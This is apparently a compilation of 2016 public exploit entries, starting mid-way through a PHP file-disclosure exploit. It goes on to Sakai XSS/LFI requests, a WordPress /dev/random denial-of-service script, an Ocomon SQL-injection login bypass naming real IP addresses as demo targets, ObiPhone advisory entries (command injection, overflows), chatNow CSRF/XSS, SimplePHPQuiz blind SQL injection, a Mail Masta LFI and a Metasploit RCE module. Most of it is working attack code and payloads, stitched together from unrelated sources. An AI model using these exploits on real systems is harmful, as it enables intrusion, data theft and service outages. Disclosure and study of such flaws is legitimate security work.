$pack.= "Host: {$host}\r\n";
$pack.= "Connection: close\r\n\r\n";
while(1) {
if(strstr(http_send($host, $port, preg_replace("/{FILE_PATH}/", '/etc/passwd', $pack)), 'root')) {
echo("\nAnonymous@{$host}:~# cat ");
if(($file = trim(fgets(STDIN))) == "exit")
break;
$ret = http_send($host, $port, preg_replace("/{FILE_PATH}/", $file, $pack));
if(strstr($ret, '<title>Error 404 NOT_FOUND</title>') || strstr($ret, '<p>Problem accessing') || strstr($ret, '<h2>HTTP ERROR 404</h2>')) {
echo("cat: {$file}: No such file or directory");
} else {
echo($ret);
}
} else {
echo("[-] Server likely not vulnerable.\n");
break;
}
}
function http_send($host, $port, $pack) {
if(!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}\n");
fwrite($sock, $pack);
$response = explode("\r\n\r\n", stream_get_contents($sock));
return($response[1]);
}
?>
Sakai 10.7 Multiple Vulnerabilities
Vendor: Apereo Foundation
Product web page: https://www.sakaiproject.org
Affected version: 10.7 (Kernel 10.7)
Summary: Sakai is a free, community source, educational software
platform designed to support teaching, research and collaboration.
Systems of this type are also known as Course Management Systems (CMS),
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).
Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site. Also there is a file disclosure vulnerability when calling
custom tool script. It is not properly verified before being used to read files.
This can be exploited to disclose contents of files from local resources.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5358
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php
Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)
https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)
https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)
https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)
29.06.2016
--
XSS when using file upload (filename parameter):
------------------------------------------------
POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
------WebKitFormBoundaryViazQNB5ok9E64l2
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"
Content-Type: application/octet-stream
testingus
------WebKitFormBoundaryViazQNB5ok9E64l2--
Response:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-UA-Compatible: IE=EmulateIE11
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 383
Date: Wed, 29 Jun 2016 11:45:49 GMT
Connection: close
<script type="text/javascript">
(function(){ var d = document.domain ; while ( true ) {
try { var test = parent.document.domain ; break ; } catch( e ) {}
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;
try { document.domain = d ; } catch (e) { break ; }}})() ;
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');
</script>
XSS when creating a job (After creating a job, click on "Triggers" link):
-------------------------------------------------------------------------
GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1
Host: localhost:8080
XSS in URI:
-----------
GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1
Host: localhost:8080
LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics.
Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting:
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):
----------------------------------------
GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
Path traversal vulnerability in WordPress Core Ajax handlers
Abstract
A path traversal vulnerability was found in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160712-0036
See also
- CVE-2016-6896
- CVE-2016-6897
- #37490 - Improve capability checks in wp_ajax_update_plugin() and wp_ajax_delete_plugin()
Tested versions
This issue was successfully tested on the WordPress version 4.5.3.
Fix
WordPress version 4.6 mitigates this vulnerability by moving the CSRF check to the top of the affected method(s).
Introduction
WordPress is web software that can be used to create a website, blog, or app. A path traversal vulnerability exists in the Core Ajax handlers of the WordPress Admin API. This issue can (potentially) be used by an authenticated user (Subscriber) to create a denial of service condition of an affected WordPress site.
Details
The path traversal vulnerability exists in the file ajax-actions.php, in particular in the function wp_ajax_update_plugin().
The function first tries to retrieve some version information from the target plugin. After this is done, it checks the user's privileges and it will verify the nonce (to prevent Cross-Site Request Forgery). The code that retrieves the version information from the plugin is vulnerable to path traversal. Since the security checks are done at a later stage, the affected code is reachable by any logged on user, including Subscribers.
Potentially this issue can be used to disclose information, provided that the target file contains a line with Version:. What is more important that it also allows for a denial of service condition as the logged in attacker can use this flaw to read up to 8 KB of data from /dev/random. Doing this repeatedly will deplete the entropy pool, which causes /dev/random to block; blocking the PHP scripts. Using a very simple script, it is possible for an authenticated user (Subscriber) to bring down a WordPress site. It is also possible to trigger this issue via Cross-Site Request Forgery as the nonce check is done too late in this case.
Proof of concept
The following Bash script can be used to trigger the denial of service condition.
#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
# login
curl --cookie-jar "$cookiejar" \
--data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
"$target/wp-login.php" \
>/dev/null 2>&1
# exhaust apache
for i in `seq 1 1000`
do
curl --cookie "$cookiejar" \
--data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
"$target/wp-admin/admin-ajax.php" \
>/dev/null 2>&1 &
done
rm "$cookiejar"
# Exploit Title: Ocomon 2.0: Acess administrative Bypass / Multiple Sql
Injection
# Google Dork: inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
# Date: 2016.08.18
# Exploit Author: Jonatas Fil a.k.a pwx
# Vendor Homepage: ninj4c0d3r.github.io
# Version: Latest 2.0RC6
# Tested on: Linux And Windows
# CVE : CVE-2005-4664
\xDetails:
========================================
[Software]
- Ocomon
[Bug Summary]
- Multiple SQL Injection (SQLi)
[Impact]
- High
[Affected Version]
- Latest 2.0RC6
- Prior versions may also be affected
=========================================
\x01- Search by dork in google
Dorks:
inurl:ocomon/index.php or intitle:Ocomon 2.0-RC6
\x02 - After, To find the victim, open the inspect element in admin page.
\x03 - Look for the parameter: <body>: <table>: <tbody>: <tr>, and return
valida() and delete the content, leaving blank.
\x04 - After, Sign in using: "admin'or'" For Username and Password.
\x05 - Finish!, You get acess in administrative page to the system.
--------------------------------------------
\xDEMO:
http://200.66.111.38/ocomon/index.php
http://191.241.229.210:8080/ocomon/index.php
http://191.241.229.210:8081/ocomon/index.php
---------------------------------------------
References:
https://packetstormsecurity.com/files/100568/Ocomon-2.0RC6-SQL-Injection.html
http://www.cvedetails.com/cve/CVE-2005-4664/
https://www.securityfocus.com/bid/15386/exploit
ObiHai ObiPhone - Multiple Vulnerabilities
------------------------------------------
Introduction
============
Multiple vulnerabilities were discovered in the web management
interface of the ObiHai ObiPhone products. The Vulnerabilities were
discovered during a black box security assessment and therefore the
vulnerability list should not be considered exhaustive.
Affected Devices and Versions
=============================
ObiPhone 1032/1062 with firmware less than 5-0-0-3497.
Vulnerability Overview
======================
Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length
Vulnerability Details
=====================
----------------------------------------------------------------------------
Obi-1. Memory corruption leading to free() of an attacker-controlled address
----------------------------------------------------------------------------
By providing a long URI (longer than 256 bytes) not containing a slash in a
request, a pointer is overwritten which is later passed to free(). By
controlling the location of the pointer, this would allow an attacker to affect
control flow and gain control of the application. Note that the free() seems to
occur during cleanup of the request, as a 404 is returned to the user before the
segmentation fault.
python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479d8b18 in free () from root/lib/libc.so.6
#1 0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>: ldr r3, [r0, #-4]
0x479d8b1c <free+52>: sub r5, r0, #8
0x479d8b20 <free+56>: tst r3, #2
0x479d8b24 <free+60>: bne 0x479d8bec <free+260>
0x479d8b28 <free+64>: tst r3, #4
(gdb) i r r0
r0 0x41 65
---------------------------------------
Obi-2. Command injection in WiFi Config
---------------------------------------
An authenticated user (including the lower-privileged "user" user) can enter a
hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet
daemon.
GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]
Note that telnetd is now running and accessible via user "root" with no
password.
-----------------------------------------------
Obi-3. Denial of Service due to buffer overflow
-----------------------------------------------
By providing a long URI (longer than 256 bytes) beginning with a slash, memory
is overwritten beyond the end of mapped memory, leading to a crash. Though no
exploitable behavior was observed, it is believed that memory containing
information relevant to the request or control flow is likely overwritten in the
process. strcpy() appears to write past the end of the stack for the current
thread, but it does not appear that there are saved link registers on the stack
for the devices under test.
python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80
(gdb) bt
#0 0x479dc440 in strcpy () from root/lib/libc.so.6
#1 0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
0x479dc44c <strcspn>: push {r4, r5, r6, lr}
0x479dc450 <strcspn+4>: ldrb r3, [r0]
(gdb) i r r1 r2
r1 0xb434df01 3023363841
r2 0xff 255
(gdb) p/x $r1+$r2
$1 = 0xb434e000
-------------------------------------------------
Obi-4. Buffer overflow in internal socket handler
-------------------------------------------------
Commands to be executed by realtime backend process `obid` are sent
via Unix domain sockets from obiapp.
In formatting the message for the Unix socket, a new string is constructed on
the stack. This string can overflow the static buffer, leading to control of
program flow. The only vectors leading to this code that were discovered during
the assessment were authenticated, however unauthenticated code paths may exist.
Note that the example command can be executed as the lower-privileged "user"
user.
GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]
(gdb)
#0 0x41414140 in ?? ()
#1 0x0006dc78 in ?? ()
---------------------------------
Obi-5. Cross-site request forgery
---------------------------------
All portions of the web interface appear to lack any protection against
Cross-Site Request Forgery. Combined with the command injection vector in
ObiPhone-3, this would allow a remote attacker to execute arbitrary shell
commands on the phone, provided the current browser session was logged-in to the
phone.
----------------------------------------------
Obi-6. Failure to implement RFC 2617 correctly
----------------------------------------------
RFC 2617 specifies HTTP digest authentication, but is not correctly implemented
on the ObiPhone. The HTTP digest authentication fails to comply in the
following ways:
- The URI is not validated
- The application does not verify that the nonce received is the one it sent
- The application does not verify that the nc value does not repeat or go
backwards
GET / HTTP/1.1
Host: foo
Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
algorithm=MD5, response="309091eb609a937358a848ff817b231c",
opaque="", qop=auth,
nc=00000001, cnonce="a"
Connection: close
HTTP/1.1 200 OK
Server: OBi110
Cache-Control:must-revalidate, no-store, no-cache
Content-Type: text/html
Content-Length: 1108
Connection: close
Please note that the realm, nonce, cnonce, and nc values have all been chosen
and the response generated offline.
--------------------------------------------------------
Obi-7. Invalid pointer dereference due to invalid header
--------------------------------------------------------
Sending an invalid HTTP Authorization header, such as
"Authorization: foo", causes the program to attempt to read from an invalid
memory address, leading to a segmentation fault and reboot of the device. This
requires no authentication, only access to the network to which the device is
connected.
GET / HTTP/1.1
Host: foo
Authorization: foo
This causes the server to dereference the address 0xFFFFFFFF, presumably
returned as a -1 error code.
(gdb) bt
#0 0x479dc438 in strcpy () from root/lib/libc.so.6
#1 0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>: ldrb r3, [r1, #1]!
0x479dc43c <strcpy+12>: cmp r3, #0
0x479dc440 <strcpy+16>: strb r3, [r1, r2]
0x479dc444 <strcpy+20>: bne 0x479dc438 <strcpy+8>
0x479dc448 <strcpy+24>: bx lr
(gdb) i r r1
r1 0xffffffff 4294967295
----------------------------------------------------
Obi-8. Null pointer dereference due to malicious URL
----------------------------------------------------
If the /obihai-xml handler is requested without any trailing slash or component,
this leads to a null pointer dereference, crash, and subsequent reboot of the
phone. This requires no authentication, only access to the network to which the
device is connected.
GET /obihai-xml HTTP/1.1
Host: foo
(gdb) bt
#0 0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args:
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>: ldr r2, [r1], #4
0x479dc7f8 <strlen+8>: ands r3, r0, #3
0x479dc7fc <strlen+12>: rsb r0, r3, #0
0x479dc800 <strlen+16>: beq 0x479dc818 <strlen+40>
0x479dc804 <strlen+20>: orr r2, r2, #255 ; 0xff
(gdb) i r r1
r1 0x0 0
------------------------------------------------------
Obi-9. Denial of service due to invalid content-length
------------------------------------------------------
Content-Length headers of -1, -2, or -3 result in a crash and device reboot.
This does not appear exploitable to gain execution. Larger (more negative)
values return a page stating "Firmware Update Failed" though it does not appear
any attempt to update the firmware with the posted data occurred.
POST / HTTP/1.1
Host: foo
Content-Length: -1
Foo
This appears to write a constant value of 0 to an address controlled by the
Content-Length parameter, but since it appears to be relative to a freshly
mapped page of memory (perhaps via mmap() or malloc()), it does not appear this
can be used to gain control of the application.
(gdb) bt
#0 0x00138250 in HTTPD_msg_proc ()
#1 0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>: strb r1, [r3, r2]
0x138254 <HTTPD_msg_proc+400>: ldr r1, [r4, #24]
0x138258 <HTTPD_msg_proc+404>: ldr r0, [r4, #88] ; 0x58
0x13825c <HTTPD_msg_proc+408>: bl 0x135a98
0x138260 <HTTPD_msg_proc+412>: ldr r0, [r4, #88] ; 0x58
(gdb) i r r3 r2
r3 0xafcc7000 2949410816
r2 0xffffffff 4294967295
Mitigation
==========
Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.
Author
======
The issues were discovered by David Tomaschik of the Google Security Team.
Timeline
========
- 2016/05/12 - Reported to ObiHai
- 2016/05/12 - Findings Acknowledged by ObiHai
- 2016/05/20 - ObiHai reports working on patches for most issues
- 2016/06/?? - New Firmware posted to ObiHai Website
- 2016/08/18 - Public Disclosure
# Exploit Title: Gnome Eye of Gnome Out-of-bounds-write
# Exploit Author: Kaslov Dmitri
# Vendor Homepage: https://wiki.gnome.org/Apps/EyeOfGnome
# Version: 3.10.2
# Tested on: Ubuntu 14.04 LTS
# CVE: CVE-2016-6855
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40291.zip
Reported: 19-August-2016
Fixed: 21-Agugst-2016 (fix will go into next software release)
GMarkup requires valid UTF8 input strings and would cause odd
looking messages if given invalid input. This could also trigger an
out-of-bounds write in glib before 2.44.1
# Exploit Title: chatNow - Multiple Vulnerabilities
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://chatnow.thiagosf.net/
# Software Link: https://github.com/thiagosf/chatNow/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
1. CSRF(Send MSG)
2. Reflected XSS
========== CSRF VULNERABILITY
### Vulnerability
'send_message.php' is not check the csrf token or referer header.
It is possible CSRF Attack.
### Attack Code
<form name="csrf_poc" action="http://127.0.0.1/vul_test/chatNow/send_message.php" method="POST">
<input type="hidden" name="to_user" value="0">
<input type="hidden" name="scroll_page" value="on">
<input type="hidden" name="id_user" value="2">
<input type="hidden" name="message" value="CSRF">
<input type="hidden" name="reserved" value="false">
<input type="submit" value="Attack!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
========== XSS VULNERABILITY
### Vulnerability
This page url is reflected data on page
It is vulnerable page because not filtered reflected url
### Attack code
http://127.0.0.1/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1
### Response
<div id="box_login">
<h2>chatNow</h2>
<form action="/vul_test/chatNow/login.php/95fb4"><script>alert(45)</script>b5ca1" method="post">
<div class="block_field">
<label for="user">Nick</label>
<input type="text" name="user" id="user" maxlength="20" />
</div>
# Exploit Title: SimplePHPQuiz - Blind SQL Injection
# Date: 2016-08-23
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz
# Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability
1-1. Nomal Request
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96
question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
1-2 Response
<div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
<p class="text-muted">© Val Okafor 2014 - Simple PHP Quiz</p>
2-1 Attack Request 1
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96
question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
2-2 Response
<div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer">
<p class="text-muted">© Val Okafor 2014 - Simple PHP Quiz</p>
3-1 Attack Request 2
POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Length: 96
question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
3-2 Response
<div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer">
<p class="text-muted">© Val Okafor 2014 - Simple PHP Quiz</p>
### Weak Parameters
correct_answer parameter
question parameter
wrong_answer1 parameter
wrong_answer2 parameter
wrong_answer3 parameter
### SQLMAP Result
#> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer
...snip...
POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 117 HTTP(s) requests:
---
Parameter: correct_answer (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit
---
[17:52:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
[+] Date: [23-8-2016]
[+] Autor Guillermo Garcia Marcos
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip
[+] Title: Mail Masta WP Local File Inclusion
[+] info: Local File Inclusion
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php:
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
Source: /inc/lists/csvexport.php
Line 5: include($_GET['pl']);
Source: /inc/campaign/count_of_send.php
Line 4: include($_GET['pl']);
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Phoenix Exploit Kit Remote Code Execution',
'Description' => %q{
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The
Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the
presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which
then silently installs malware.
},
'License' => MSF_LICENSE,
'Author' =>
[
'CrashBandicot @DosPerl', #initial discovery
'Jay Turla <@shipcod3>', #msf module
],
'References' =>
[
[ 'EDB', '40047' ],
[ 'URL', 'http://krebsonsecurity.com/tag/phoenix-exploit-kit/' ], # description of Phoenix Exploit Kit
[ 'URL', 'https://www.pwnmalw.re/Exploit%20Pack/phoenix' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 200,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Targets' =>
[
['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],
['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]
],
'DisclosureDate' => 'Jul 01 2016',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),
],self.class)
end
def check
test = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{test};")
if res && res.body.include?(test)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
encoded = Rex::Text.encode_base64(payload.encoded)
http_send_command("passthru(base64_decode(\"#{encoded}\"));")
end
def http_send_command(cmd)
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'vars_get' => {
'bdr' => cmd
}
})
end
end